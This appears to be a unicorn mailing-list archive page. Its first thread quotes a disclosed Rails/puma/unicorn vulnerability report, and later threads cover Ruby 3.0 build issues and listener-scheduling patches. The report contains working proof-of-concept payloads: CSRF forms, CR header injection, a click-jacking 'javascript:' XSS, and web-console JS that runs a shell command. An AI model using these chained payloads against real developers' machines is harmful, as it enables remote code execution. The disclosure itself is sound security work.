ooooooo_q------

I thought about it after submitting the report, but even in 6.0.3.2,
/rails/actions is available in developer mode.
If it was started in development mode, the request will be accepted by
CSRF, so the same as CVE-2020-8185 still exists.
I think it's better to take CSRF measures in /rails/actions.

Vulnerabilities, versions and modes:

6.0.3.1 (production, development)
  - run pending migrations (CVE-2020-8185)
  - open redirect

6.0.3.2 (development)
  - run pending migrations (by CSRF)
  - open redirect (by CSRF)

6.0.3.2 (production)
  - no problem


tenderlove (Ruby on Rails staff) -------

This seems like a good improvement, but I don't think we need to treat
it as a security issue. If you agree, would you mind filing an issue
on the Rails GitHub issues?
Thank you!


ooooooo_q------

@tenderlove
I'm sorry to reply late.

While researching unicorn, I found this report to lead to other vulnerabilities.

Open Redirect to HTTP header injection
Response header injection vulnerability exists in versions of puma below 4.3.2.
https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v
I have confirmed that unicorn is also capable of response header injection.

HTTP header injection is possible by including \r in the redirect URL
using these.

PoC
> escape("\rSet-cookie:a=a")
"%0DSet-cookie%3Aa%3Da"
This is the html used on the attack server.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0DSet-cookie%3Aa%3Da">
  <button type="submit">set cookie</button>
</form>
When clicking this button, the response header will be as follows.

Location:
Set-cookie: a=a
If you open the developer tools in your browser, you'll see that the
cookie value is set.

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Therefore, it seems that response body injection that leads to XSS
cannot be performed.
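For illustration, a deliberately naive response writer shows how an unvalidated "\r" in a header value smuggles an extra line into the response head (a hypothetical sketch, not unicorn's actual writer):

```ruby
require 'stringio'

# Hypothetical sketch: a naive writer that interpolates header values
# verbatim lets a "\r" inside "Location" inject a Set-cookie line.
def write_response_head(io, status, headers)
  io.write("HTTP/1.1 #{status}\r\n")
  headers.each { |k, v| io.write("#{k}: #{v}\r\n") } # no validation
  io.write("\r\n")
end

OUT = StringIO.new
write_response_head(OUT, 302, 'Location' => "\rSet-cookie:a=a")
# OUT.string now contains a smuggled "Set-cookie:a=a" line
```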

On the other hand, in passenger, it became an error when \r was in the
value of the header.

XSS trick
While trying out \r on the response header, I noticed a strange thing.
If \r is at the beginning, it means that the browser is not redirected
and javascript: can be used in the URL of the response link.
When specifying \rjavascript:alert(location) as the redirect destination,
the HTML of the response will be as follows.

<html><body>You are being <a href="
javascript:alert(location)">redirected</a>.</body></html>
The \r character is ignored in html, so javascript:alert(location) is
executed when the user clicks the link.

This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
In puma and unicorn below 4.3.2, \r is used for HTTP header injection,
so no error occurs.
With puma 4.3.3 or later, if there is a line containing \r, it does
not become an error and it can be executed because that line is
excluded.
On the other hand, the error occurred in passenger.

As a further issue, the headers in this response are
middleware-specific and therefore do not include the security headers
Rails is outputting.
Since X-Frame-Options is not included, click jacking is possible.
No output even if CSP is set in the application.

By using click jacking in combination with these, it is easy to
generate XSS that requires user click.

PoC
Inserting the execution code from another site using the name of the iframe.

This PoC will also run in production mode if 6.0.0 < rails < 6.0.3.2.
It can be run with the latest puma and unicorn.

If it is development mode, it can be executed even after 6.0.3.2

child.html
<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aeval%28name%29">
    <button type="submit">location is escape("\rjavascript:eval(name)")</button>
</form>
<script type="text/javascript">
    document.querySelector("button").click();
</script>
click_jacking.html
<html>
<style>
iframe{
    position: absolute;
    z-index: 1;
    opacity: 0.3;
}
div{
    position: absolute;
    top: 20px;
    left: 130px;
}
button {
    width: 80px;
    height: 26px;
    cursor: pointer;
}
</style>
<body>
    <iframe src=./child.html name="alert(location)" height=40></iframe>
    <div>
        <button>click!!</button>
    </div>
</body>
</html>



XSS to RCE
When XSS exists in development mode, I confirmed that calling the
method of web-console leads to RCE.
RCE is possible by inducing users who are developing Rails
applications to click on the trap site.

PoC
var iframe = document.createElement("iframe");
iframe.src = "/not_found";
document.body.appendChild(iframe);
setTimeout(()=>fetch("/__web_console/repl_sessions/" +
iframe.contentDocument.querySelector("#console").dataset.sessionId, {
    method: "PUT",
    headers: {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    },
    body: JSON.stringify({
        input: "`touch from_web_console`"
    })
}), 2000)
<iframe src=./child.html name='var iframe =
document.createElement("iframe");iframe.src =
"/not_found";document.body.appendChild(iframe);setTimeout(()=>
fetch("/__web_console/repl_sessions/"+iframe.contentDocument.querySelector("#console").dataset.sessionId,
{method: "PUT",headers: {"Content-Type":
"application/json","X-Requested-With": "XMLHttpRequest"},body:
JSON.stringify({input: "`touch from_web_console`"})}),2000)'/>
When this is run, a file named from_web_console will be generated.

Vulnerabilities and conditions
Run pending migrations (CVE-2020-8185)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

Run pending migrations by CSRF
server: any

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

Open redirect (from POST method)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

HTTP header injection
server: unicorn (<= latest) or puma (< 4.3.2)

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

XSS (need user click)
server: unicorn (<= latest) or puma (<= latest)

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

RCE (from XSS)
server: unicorn (<= latest) or puma (<= latest)
Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development



ooooooo_q------

> When I tried it, puma and unicorn can insert only the character of \r,
> and it seems that \n cannot be inserted.

Makes sense. This seems like a security vulnerability in Puma / Unicorn.

> This is a separate issue from HTTP header injection and depends on how
> the server handles the value of \r.

I'm not sure exactly which servers are vulnerable (this is too
confusing for me 😔), but whatever handles generating the response
page shouldn't allow \r at the beginning of the href like that.
So this needs to check that location is a url (http or https).
I don't think we need to set the security policy for the redirect page
if we prevent the javascript: location from the href.
How does this patch look?
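One possible shape for such a check (a hedged sketch, not the actual Rails patch): accept only absolute http/https URLs as redirect targets, which rejects both "\r..." and "javascript:" payloads.

```ruby
require 'uri'

# Hypothetical sketch of the location check discussed above: only
# absolute http/https URLs pass; control characters make URI.parse
# raise, and "javascript:" fails the scheme allowlist.
def safe_redirect_location?(location)
  uri = URI.parse(location.to_s)
  %w[http https].include?(uri.scheme)
rescue URI::InvalidURIError
  false
end
```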

On Wed, Jan 6, 2021 at 5:53 PM Eric Wong <bofh@yhbt.net> wrote:
>
> Sam Sanoop <sams@snyk.io> wrote:
> > Hi Eric,
>
> cf. https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> (private followup <CAEQPCYJJdriMQyDNXimCS_kBrc_=DxhxJ66YdJmCe7ZXr-Zbvg@mail.gmail.com>)
>
> Hi Sam, I'm moving this to the public list.  Please keep
> unicorn-public@yhbt.net Cc-ed (no need to quote, archives are
> public and mirrored to several places).
>
> > I wanted to bring this up again. I spoke with the researcher
> > (@ooooooo_q) who disclosed this issue to us. He released the full
> > details including the HackerOne report pubclily which provided more
> > clarity about this issue. That can be read here:
> > https://hackerone.com/reports/904059#activity-8945588
>
> Note: I can't read anything on hackerone due to the JavaScript
> requirement.  If somebody can copy the text here, that'd be
> great.
>
> > That report was initially disclosed to the Ruby on Rails maintainers.
> > In certain conditions, he was also able to leverage Puma and Unicorn
> > to exploit the issues mentioned on the report. The issues which
> > related to Unicorn were:
> >
> > * Open Redirect to HTTP header injection - (including \r in the redirect URL)
> > * A user interaction XSS  - Which leverages
> > \rjavascript:alert(location) as the redirect destination
>
> Does this happen when unicorn is behind nginx?
>
> unicorn was always designed to run behind nginx and falls over badly
> without it (trivially DoS-ed via slowloris)
>
> > Reading that advisory, I see this more of an issue now. He has
> > leveraged Unicorn and Puma along with Rails to demonstrate some of the
> > proof of concepts. Under the section Vulnerabilities and conditions of
> > the report, he has specified different conditions and configurations
> > which allow for this vector.
> >
> > I agree with Aaron Patterson's (Rails Staff) decision on that report,
> > this should be fixed in Unicorn and Puma directly, and Puma has
> > already fixed this and issued an advisory:
> > https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v.
> >
> > I believe there is enough of a risk to fix this issue. What do you think?
>
> While we follow puma on some things (as in recent non-rack
> features), I'm not sure if this affects unicorn the same way it
> affects puma and other servers (that are supported without nginx).
>
> Fwiw, I've been against client-side JavaScript for a decade, now.
> Libre license or not; the complexity of JS gives us a never-ending
> stream of vulnerabilities, wasted RAM, CPU cycles, and bandwidth
> use from constant software updates needed to continue the game of
> whack-a-mole.
>
> rest of thread below (top-posting corrected):
>
> > > On Sun, Jan 3, 2021 at 10:20 PM Eric Wong <bofh@yhbt.net> wrote:
> > > >
> > > > Sam Sanoop <sams@snyk.io> wrote:
> > > > > Hey Eric,
> > > > >
> > > > > Happy New Year. I want to follow up on the [RFC] http_response: ignore
> > > > > invalid header response character RFC for the CRLF injection we spoke
> > > > > about previously. I wanted to know what would be the timeline for your
> > > > > patch to get merged and what additional steps there are before that
> > > > > can happen.
> > > >
> > > > Hi Sam, honestly I have no idea if it's even necessary...
> > > > I've had no feedback since 2020-11-26:
> > > >   https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> > > >
> > > > Meanwhile 5.8.0 was released 2020-12-24 with a feature somebody
> > > > actually cared about.
> > > >
> > > > Again, unicorn falls over without nginx in front of it anyways,
> > > > so maybe nginx already guards against this and extra code is
> > > > unnecessary on my end.
> >
> > On Sun, Jan 3, 2021 at 11:03 PM Sam Sanoop <sams@snyk.io> wrote:
> > >
> > > Hey Eric,
> > >
> > > No problem, I understand. Since the injection here is happening within
> > > the response, I am not convinced if this is exploitable as well. I
> > > have let the reporter of this issue know what your stance is. I
> > > mentioned if he can provide a better Proof of Concept where this is
> > > exploitable in the context of a http request, and look into this a bit
> > > further, we can open up discussion again, or else, this is not worth
> > > fixing.



-- 

Sam Sanoop
Security Analyst

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-08  8:50  6%                           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-09-08  8:50 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > Ah, perhaps adding some checks to extconf.rb would be useful?
> > Or moving the ragel invocation into the extconf.rb-generated
> > Makefile? (not too sure how to do that...).
> 
> Not really no. And it would make ragel a build dependency.

No, the generated .c file would still be distributed with the
gem as it is today.  I'm absolutely against introducing new
build requirements (optional dependencies, maybe, but not
requirements).

Changing the .rl file might result in ragel running (or emit
warning if ragel isn't installed).  Not too sure how to do that
via mkmf, though...  Or it would just throw a warning and drop a
hint to run "make ragel" at the top-level if the .c file is
missing...
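A hypothetical extconf.rb fragment along those lines might warn early instead of failing at link time (the path and wording are illustrative):

```ruby
# Hypothetical extconf.rb fragment: warn when the ragel-generated C
# source is absent, rather than failing later with a missing symbol.
# File name and message are illustrative, not unicorn's actual code.
def generated_source_present?(path)
  return true if File.exist?(path)
  warn "#{path} is missing; run `make ragel' at the top level " \
       "(requires ragel) to regenerate it"
  false
end

generated = File.expand_path('unicorn_http.c', __dir__) # illustrative
generated_source_present?(generated) # warns if the file is absent
```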

> But really I don't think so many people need to use unicorn
> branches.

*shrug*  I figure for any one person that posts a comment for
something on any public forum, there's probably 10 that feel the
same way.

> > OK, soon.  Maybe with just the aforementioned ragel check above;
> > or not even...  
> 
> I'd say not even. It's just for people like me trying to run branches.

Alright, we can experiment with more build system changes
another time (and I zoned out while writing the 5.7
release notes and forgot to note the minor build system changes
I made right after the 5.6.0 release :x)

https://yhbt.net/unicorn-public/20200908084429.GA16521@dcvr/

^ permalink raw reply	[relevance 6%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  2020-09-03  8:29  0%           ` Jean Boussier
@ 2020-09-03  9:31  0%             ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2020-09-03  9:31 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> >> I'm trying to figure out why the symbol isn't exported,
> >> I might come back with another patch. But just in case
> >> you might have an idea what's going on.
> > 
> > I haven't built+tested ruby.git in ages (my computers are too slow).
> > It could be a failure to completely clean out the old 2.8 stuff
> > (either in the Ruby worktree, install paths, or unicorn worktree).
> 
> I don't think so, I'm building from a fresh docker image + fresh unicorn
> clone.
> 
> I also tested other similar gems (e.g. puma) and they export the functions
> just fine. 

Do the current dependencies (kgio, raindrops) export alright, as well?
Might be worth comparing the generated Makefile with other gems
and see if there's missing flags or such.

> I have to admit that I don't understand enough about the build process
> to figure out what's going on, so I'm not very confident I'll find a fix.

I'm not a build/linker expert, either.  Also, did things work a
few days/weeks ago when ruby.git was still 2.8?  Maybe mkmf.log
has clues, somewhere, too...

*shrug* my brain hurts from other stuff

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  2020-09-03  8:25  0%         ` Eric Wong
@ 2020-09-03  8:29  0%           ` Jean Boussier
  2020-09-03  9:31  0%             ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2020-09-03  8:29 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

>> That could work yes. Something akin to:
>> "This ruby version wasn't tested, blah blah".
> 
> OK, can you send a patch for that?

I will once I have something working on 3.0.

>> I'm trying to figure out why the symbol isn't exported,
>> I might come back with another patch. But just in case
>> you might have an idea what's going on.
> 
> I haven't built+tested ruby.git in ages (my computers are too slow).
> It could be a failure to completely clean out the old 2.8 stuff
> (either in the Ruby worktree, install paths, or unicorn worktree).

I don't think so, I'm building from a fresh docker image + fresh unicorn
clone.

I also tested other similar gems (e.g. puma) and they export the functions
just fine. 

I have to admit that I don't understand enough about the build process
to figure out what's going on, so I'm not very confident I'll find a fix.

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  2020-09-03  7:52  4%       ` Jean Boussier
@ 2020-09-03  8:25  0%         ` Eric Wong
  2020-09-03  8:29  0%           ` Jean Boussier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2020-09-03  8:25 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > Perhaps adding warnings about untested+unsupported
> > versions to test_helper.rb and extconf.rb is a better way to go?
> 
> That could work yes. Something akin to:
> "This ruby version wasn't tested, blah blah".

OK, can you send a patch for that?

> > Then, maybe leave the version check out of the gemspec entirely.
> 
> The gemspec ruby version is very useful but for minimum requirement
> only. e.g. `>= 1.9.3`.

Yes, I suppose; I was kinda interested in using 2.3+ socket
features (replacing kgio) but I might just use io_uring on
Linux, at least.

> > Fwiw, the type of breakage from incompatibilities I'm worried
> > about is subtle things that don't show up immediately
> > (e.g. encodings, hash ordering, frozen strings, etc...).
> 
> That's understandable, but 3.0 is not any more likely than 2.7
> to break any of these, and it's important that gems are testable on
> ruby pre-release, otherwise you end up with a chicken and egg
> problem of not being able to report compatibility breakages
> to ruby-core.

Agreed.

> On a totally different note, it seems that unicorn is not compiling
> quite properly against Ruby 3.0.0-dev, at least on linux:
> 
>    unicorn_http.so: undefined symbol: Init_unicorn_http
> 
> I'm trying to figure out why the symbol isn't exported,
> I might come back with another patch. But just in case
> you might have an idea what's going on.

I haven't built+tested ruby.git in ages (my computers are too slow).
It could be a failure to completely clean out the old 2.8 stuff
(either in the Ruby worktree, install paths, or unicorn worktree).

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-03  7:52  4%       ` Jean Boussier
  2020-09-03  8:25  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2020-09-03  7:52 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> Perhaps adding warnings about untested+unsupported
> versions to test_helper.rb and extconf.rb is a better way to go?

That could work yes. Something akin to:
"This ruby version wasn't tested, blah blah".

> Then, maybe leave the version check out of the gemspec entirely.

The gemspec ruby version is very useful but for minimum requirement
only. e.g. `>= 1.9.3`.
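
A floor-only constraint like that behaves as follows (standalone illustration using RubyGems' own classes):

```ruby
# a minimum-only requirement admits future majors (e.g. 3.0)
# while still rejecting anything older than the floor
req = Gem::Requirement.new('>= 1.9.3')
req.satisfied_by?(Gem::Version.new('3.0.0')) # => true
req.satisfied_by?(Gem::Version.new('1.8.7')) # => false
```

This is why leaving the upper bound out of the gemspec avoids the chicken-and-egg problem with pre-release rubies.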

> Fwiw, the type of breakage from incompatibilities I'm worried
> about is subtle things that don't show up immediately
> (e.g. encodings, hash ordering, frozen strings, etc...).

That's understandable, but 3.0 is not any more likely than 2.7
to break any of these, and it's important that gems are testable on
ruby pre-release, otherwise you end up with a chicken and egg
problem of not being able to report compatibility breakages
to ruby-core.

On a totally different note, it seems that unicorn is not compiling
quite properly against Ruby 3.0.0-dev, at least on linux:

   unicorn_http.so: undefined symbol: Init_unicorn_http

I'm trying to figure out why the symbol isn't exported,
I might come back with another patch. But just in case
you might have an idea what's going on.

^ permalink raw reply	[relevance 4%]

* Re: Sustained queuing on one listener can block requests from other listeners
  2020-04-15  5:26  0% ` Eric Wong
@ 2020-04-16  5:46  0%   ` Stan Hu
  0 siblings, 0 replies; 200+ results
From: Stan Hu @ 2020-04-16  5:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks, Eric. That patch didn't work; it spun the CPU. I think this worked?

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index a52931a..aaa4955 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -708,7 +708,7 @@ def worker_loop(worker)
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      if nr == readers.size
         tmp = ready.dup
         redo
       end
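
The stall under discussion can be modeled without sockets. In this toy simulation (hypothetical names, not unicorn's actual code), the "redo" path reuses the stale ready list from the last select(2), so a busy first listener is drained completely before the second is ever revisited:

```ruby
# pending[i] = queued connections on listener i; returns processing order.
# greedy_redo: true mimics the worker_loop "bet" of skipping select()
# and reusing the stale ready list after any successful accept.
def drain(pending, greedy_redo:)
  order = []
  ready = [0]            # pretend the last select(2) reported only listener 0
  loop do
    nr = 0
    ready.each do |i|
      next unless pending[i] > 0
      pending[i] -= 1    # "accept" and process one client
      order << i
      nr += 1
    end
    next if greedy_redo && nr > 0  # redo: skip select, keep the stale list
    # fresh select(2): every listener with pending work becomes ready
    ready = (0...pending.size).select { |i| pending[i] > 0 }
    break if ready.empty?
  end
  order
end

drain([3, 2], greedy_redo: true)  # => [0, 0, 0, 1, 1]  listener 1 starves
drain([3, 2], greedy_redo: false) # => [0, 0, 1, 0, 1]  interleaved
```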

On Tue, Apr 14, 2020 at 10:26 PM Eric Wong <e@yhbt.net> wrote:
>
> Stan Hu <stanhu@gmail.com> wrote:
> > My unicorn.rb has two listeners:
> >
> > listen "127.0.0.1:8080", :tcp_nopush => false
> > listen "/var/run/unicorn.socket", :backlog => 1024
>
> Fwiw, lowering :backlog may make sense if you got other
> hosts/instances.  More below..
>
> > We found that because of the greedy attempt to accept new connections
> > before calling select() in
> > https://github.com/defunkt/unicorn/blob/981f561a726bb4307d01e4a09a308edba8d69fe3/lib/unicorn/http_server.rb#L707-L714,
> > listeners on another socket stall out until the first listener is
> > drained. We would expect Unicorn to round-robin between the two
> > listeners, but that doesn't happen as long as there is work to be done
> > for the first listener. We've verified that deleting that `redo` block
> > fixes the problem.
> >
> > What do you think about the various options?
> >
> > 1. Only running that redo block if there is one listener
>
> That seems reasonable, or if ready.size == nr_listeners
> (proposed patch below)
>
> > 2. Removing the redo block entirely
>
> From what I recall ages ago, select() entry cost is pretty high
> and I remember that redo helping a fair bit even in 2009 with
> simple apps.  Syscall cost is even higher now with CPU
> vulnerability mitigations, and Ruby 1.9+ GVL release+reacquire
> is also a penalty I didn't have when developing this on 1.8.
>
> Do you have time+hardware to benchmark either approach on a
> simple app?  I no longer have stable/reliable hardware for
> benchmarking.  Thanks.
>
> Totally untested patch to try approach #1
>
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index a52931a..69f1f60 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -686,6 +686,7 @@ def worker_loop(worker)
>      trap(:USR1) { nr = -65536 }
>
>      ready = readers.dup
> +    nr_listeners = readers.size
>      @after_worker_ready.call(self, worker)
>
>      begin
> @@ -698,7 +699,6 @@ def worker_loop(worker)
>          # but that will return false
>          if client = sock.kgio_tryaccept
>            process_client(client)
> -          nr += 1
>            worker.tick = time_now.to_i
>          end
>          break if nr < 0
> @@ -708,7 +708,7 @@ def worker_loop(worker)
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0
> +      if ready.size == nr_listeners
>          tmp = ready.dup
>          redo
>        end
>
>
>
> And `nr' can probably just be a boolean `reopen' flag if we're
> not overloading it as a counter.

^ permalink raw reply related	[relevance 0%]

* Re: Sustained queuing on one listener can block requests from other listeners
  2020-04-15  5:06  4% Sustained queuing on one listener can block requests from other listeners Stan Hu
@ 2020-04-15  5:26  0% ` Eric Wong
  2020-04-16  5:46  0%   ` Stan Hu
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2020-04-15  5:26 UTC (permalink / raw)
  To: Stan Hu; +Cc: unicorn-public

Stan Hu <stanhu@gmail.com> wrote:
> My unicorn.rb has two listeners:
> 
> listen "127.0.0.1:8080", :tcp_nopush => false
> listen "/var/run/unicorn.socket", :backlog => 1024

Fwiw, lowering :backlog may make sense if you got other
hosts/instances.  More below..

> We found that because of the greedy attempt to accept new connections
> before calling select() in
> https://github.com/defunkt/unicorn/blob/981f561a726bb4307d01e4a09a308edba8d69fe3/lib/unicorn/http_server.rb#L707-L714,
> listeners on another socket stall out until the first listener is
> drained. We would expect Unicorn to round-robin between the two
> listeners, but that doesn't happen as long as there is work to be done
> for the first listener. We've verified that deleting that `redo` block
> fixes the problem.
> 
> What do you think about the various options?
> 
> 1. Only running that redo block if there is one listener

That seems reasonable, or if ready.size == nr_listeners
(proposed patch below)

> 2. Removing the redo block entirely

From what I recall ages ago, select() entry cost is pretty high
and I remember that redo helping a fair bit even in 2009 with
simple apps.  Syscall cost is even higher now with CPU
vulnerability mitigations, and Ruby 1.9+ GVL release+reacquire
is also a penalty I didn't have when developing this on 1.8.

Do you have time+hardware to benchmark either approach on a
simple app?  I no longer have stable/reliable hardware for
benchmarking.  Thanks.

Totally untested patch to try approach #1

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index a52931a..69f1f60 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -686,6 +686,7 @@ def worker_loop(worker)
     trap(:USR1) { nr = -65536 }
 
     ready = readers.dup
+    nr_listeners = readers.size
     @after_worker_ready.call(self, worker)
 
     begin
@@ -698,7 +699,6 @@ def worker_loop(worker)
         # but that will return false
         if client = sock.kgio_tryaccept
           process_client(client)
-          nr += 1
           worker.tick = time_now.to_i
         end
         break if nr < 0
@@ -708,7 +708,7 @@ def worker_loop(worker)
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      if ready.size == nr_listeners
         tmp = ready.dup
         redo
       end



And `nr' can probably just be a boolean `reopen' flag if we're
not overloading it as a counter.

^ permalink raw reply related	[relevance 0%]

* Sustained queuing on one listener can block requests from other listeners
@ 2020-04-15  5:06  4% Stan Hu
  2020-04-15  5:26  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Stan Hu @ 2020-04-15  5:06 UTC (permalink / raw)
  To: unicorn-public

My unicorn.rb has two listeners:

listen "127.0.0.1:8080", :tcp_nopush => false
listen "/var/run/unicorn.socket", :backlog => 1024

We found that because of the greedy attempt to accept new connections
before calling select() in
https://github.com/defunkt/unicorn/blob/981f561a726bb4307d01e4a09a308edba8d69fe3/lib/unicorn/http_server.rb#L707-L714,
listeners on another socket stall out until the first listener is
drained. We would expect Unicorn to round-robin between the two
listeners, but that doesn't happen as long as there is work to be done
for the first listener. We've verified that deleting that `redo` block
fixes the problem.

What do you think about the various options?

1. Only running that redo block if there is one listener
2. Removing the redo block entirely

^ permalink raw reply	[relevance 4%]

* Re: Traffic priority with Unicorn
  2019-12-17  5:12  0% ` Eric Wong
@ 2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 0 replies; 200+ results
From: Bertrand Paquet @ 2019-12-18 22:06 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On Tue, 17 Dec 2019 at 06:12, Eric Wong <bofh@yhbt.net> wrote:
>
> Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> > Hello,
> >
> > I would like to introduce some traffic priority in Unicorn. The goal
> > is to keep critical endpoints online even if the application is
> > slowing down a lot.
> >
> > The idea is to classify the request at nginx level (by vhost, http
> > path, header or whatever), and send the queries to two different
> > unicorn sockets (opened by the same unicorn instance): one for high
> > priority request, one for low priority request.
> > I need to do some small modifications [1] in the unicorn worker loop
> > to process high priority requests first. It seems to work:
> > - I launch a first apache bench toward the low priority port
> > - I launch a second apache bench toward the high priority port
> > - Unicorn handles the queries only for that one, and stops answering
> > the low priority traffic
>
> > [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
>
> Easier to view locally w/o JS/CSS using "git show -W" for context:
>
> $ git remote add bpaquet https://github.com/bpaquet/unicorn
> $ git fetch bpaquet
> $ git show -W 58d6ba28
>   <snip>
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index 5334fa0c..976b728e 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
>    # runs inside each forked worker, this sits around and waits
>    # for connections and doesn't die until the parent dies (or is
>    # given a INT, QUIT, or TERM signal)
>    def worker_loop(worker)
>      ppid = @master_pid
>      readers = init_worker_process(worker)
>      nr = 0 # this becomes negative if we need to reopen logs
>
>      # this only works immediately if the master sent us the signal
>      # (which is the normal case)
>      trap(:USR1) { nr = -65536 }
>
>      ready = readers.dup
> +    high_priority_reader = readers.first
> +    last_processed_is_high_priority = false
>      @after_worker_ready.call(self, worker)
>
>      begin
>        nr < 0 and reopen_worker_logs(worker.nr)
>        nr = 0
>        worker.tick = time_now.to_i
>        tmp = ready.dup
>        while sock = tmp.shift
>          # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
>          # but that will return false
>          if client = sock.kgio_tryaccept
> +          last_processed_is_high_priority = sock == high_priority_reader
>            process_client(client)
>            nr += 1
>            worker.tick = time_now.to_i
>          end
> -        break if nr < 0
> +        break if nr < 0 || last_processed_is_high_priority
>        end
>
>        # make the following bet: if we accepted clients this round,
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0
> +      unless nr == 0 || !last_processed_is_high_priority
>          tmp = ready.dup
>          redo
>        end
>
>        ppid == Process.ppid or return
>
>        # timeout used so we can detect parent death:
>        worker.tick = time_now.to_i
>        ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
>      rescue => e
>        redo if nr < 0 && readers[0]
>        Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
>      end while readers[0]
>    end
>
>    # delivers a signal to a worker and fails gracefully if the worker
>    # is no longer running.
>
> > The tradeoffs are
> > - No more "bet"[2] on low priority traffic. This probably slows down
> > the low priority traffic a little.
>
> Yeah, but low priority is low priority, so it's fine to slow
> them down, right? :>
>
> > - This approach is only low / high. Not sure if I can extend it for 3
> > (or more) levels of priority without a non-negligible performance
> > impact (because of the "bet" above).
>
> I don't think it makes sense to have more than two levels of
> priority (zero, one, two, infinity rule?)
> <https://en.wikipedia.org/wiki/Zero_One_Infinity>
>
> > Do you think this approach is correct?
>
> readers order isn't guaranteed, especially when inheriting
> sockets from systemd or similar launchers.

Interesting point.

>
> I think some sort order could be defined via listen option...
>
> I'm not sure if inheriting multiple sockets from systemd or
> similar launchers using LISTEN_FDS env can guarantee ordering
> (or IO.select in Ruby, for that matter).
>
> It seems OK otherwise, I think...  Have you tested in real world?

Not yet. But I will probably test it soon.

>
> > Do you have any better idea to have some traffic prioritization?
> > (Another idea is to have dedicated workers for each priority class.
> > This approach has other downsides, I would like to avoid it).
> > Is it something we can introduce in Unicorn (not as default
> > behaviour, but as a configuration option)?
>
> If you're willing to drop some low-priority requests, using a
> small listen :backlog value for a low-priority listen may work.
>
> I'm hesitant to put extra code in worker_loop method since
> it can slow down current users who don't need the feature.
>
> Instead, perhaps try replacing the worker_loop method entirely
> (similar to how oob_gc.rb wraps process_client) so users who
> don't enable the feature won't be penalized with extra code.
> Users who opt into the feature can get an entirely different
> method.

Ok I will try this approach. I'm a little bit annoyed by the code duplication.

>
> > Thx for any opinion.
>
> The best option would be to never get yourself in a situation
> where you're overloaded, by making everything fast :>
> Anything else seems pretty ugly...

On a system which handles 10k QPS, it's really difficult to never have
an issue somewhere :)

Thx

Bertrand

^ permalink raw reply	[relevance 0%]

* Re: Traffic priority with Unicorn
